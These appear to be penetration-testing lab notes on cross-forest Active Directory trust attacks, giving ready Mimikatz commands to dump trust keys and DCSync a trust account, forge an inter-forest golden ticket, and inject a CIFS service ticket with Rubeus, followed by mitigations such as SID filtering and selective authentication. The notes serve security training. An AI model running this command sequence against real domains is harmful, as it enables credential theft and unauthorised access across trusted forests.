Cross Forest Attacks

General

• Same attack flow as with cross-domain attacks

• But: trust between forest must be established manually

• No implicit trust

• Cannot abuse SID because of SID filtering

• We only get the privileges the user we are impersonating has in the target forest

Exploitation

# Get trust key for the inter-forest trust
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\ecorp$"'

# Forge inter-forest TGT
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:Administrator /target:eurocorp.local /rc4:9a3dafc4139bc3fb7b6dade2a35d6f74 /service:krbtgt /ticket:forest_tgt.kirbi"'

# Request and inject TGS for CIFS service using Rubeus
.\Rubeus.exe asktgs /ticket:forest_tgt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

# Check access
ls \\eurocorp-dc.eurocorp.local\SharedWithDCorp\

Mitigation

SID Filtering

• Avoid attacks which abuse SID history attribute across forest trust

• Enabled by default on all inter forest trusts. Intra forest trusts are assumed secured by default (MS considers forest and not the domain to be a security boundary)

• But, since SID filtering has potential to break applications and user access, it is often disabled

Selective Authentication

• If configured in an inter-forest trust, users between trusts will not be automatically authenticated

• Invididual access to domains and servers in the trusting domain/forest should be given